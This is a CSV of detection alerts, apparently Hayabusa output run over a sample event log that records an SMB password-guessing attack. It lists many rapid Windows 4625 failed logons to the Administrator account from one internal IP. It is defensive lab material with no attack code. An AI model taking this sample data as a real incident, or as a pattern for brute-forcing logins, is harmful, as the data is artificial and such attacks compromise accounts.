2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSfaPdcsiRQoGYYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJRP4bS9Qgg06Z5P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3Z4veMNKngHUDoRf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmF0YFgAMSRotb1y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DmrbO3dZw46DgmZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qg4CMwLpfzLrvDPj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKDKUXNNhuSqRiTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cBocrjNXjmuPCKRJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: loCrAXibgVxcOtCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZ7pHOJeOExrON2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MeucKpaodpmdsqhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LRlmBeBlV6n4MQyo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8FYOF6HxJHqm7GW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9tBtz1GYn5J8sbFH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qn8PlxEzIu9AKUgt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdjqlNDU3U150UAw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esaTfuwuiFAkIVs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y4LbVQ5ytgVCqFmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rWoX76sgYTVwxkD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQFJRRYn6sjYK5cD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wyVuBGEFGJqImQ7W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pRvnyVGxG8i0e3PQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X6Hv2fj43a8j1O2P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: myP4zVFyw2qE1SV7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lpmBcVilH72dYF7E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jd9hKGDxLcnZphlL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OmXgOD9kaGJ4PIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BpQtWW0fAEzNH28B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EgNkY8LKSWcnLM00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8S1dUwb3HjOnEs9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49ZKcnswdISJDwbS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qOuYmww71pTM0l3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PUHoGgmXKRJknRZG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6yf8LSkcwBP9s1mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmH2AMDmkZVbCt8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I23o9EQLpPpn9RlY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrEVj3DB1prpOtnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Iau1IHKxWRsqQaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdPC9LVhZS2l27XF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxcofRpjCFme3mg2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e1VnQLbETh1GgX0c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbdPYXx8mx4SV9G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcv3HWid3auIu7cY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2OviUvdOmk5HON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bVBSORhgFwTy2TWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DsIhCEZcfYenufvf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDadVFtE4toNiagy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnydJjDBdzJWqmWa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW8im2IhNzrGoSFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTzlqq9HLEX6wzdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz98aGXd0fdVzmTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2zOy64cp6dXelNl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X1BflxNjQRNopjb4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 401ulFeuzCtp5lPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p0SIzJrzkseFB1j8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cyQMxtEdbud8iJLI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gbjIqxD4E6fYsGx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEeZEcj63sBddCsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiATfqYtrH9LoqR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PG3HB3GqFwQFLdcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G8NU6WRdrq9DxM6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cvZKIkI2aeBzbwe0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EE7AL3nJ7qsnk4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feu34D0VvoMrnWzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrNRIpCpmAV3npax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zpxgEvvoC0stFdTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XvpDKRAPDS36sqNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4cqJKEIySxiQdCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm1F7QEwBE054ui0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvIjhyfdlXiX72Es | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJilW4KgIEeh5VNr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Ka0FYYdVOj90l0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9ZjGE8T6RuGx8SZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkti4BGVrpoAQRBL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
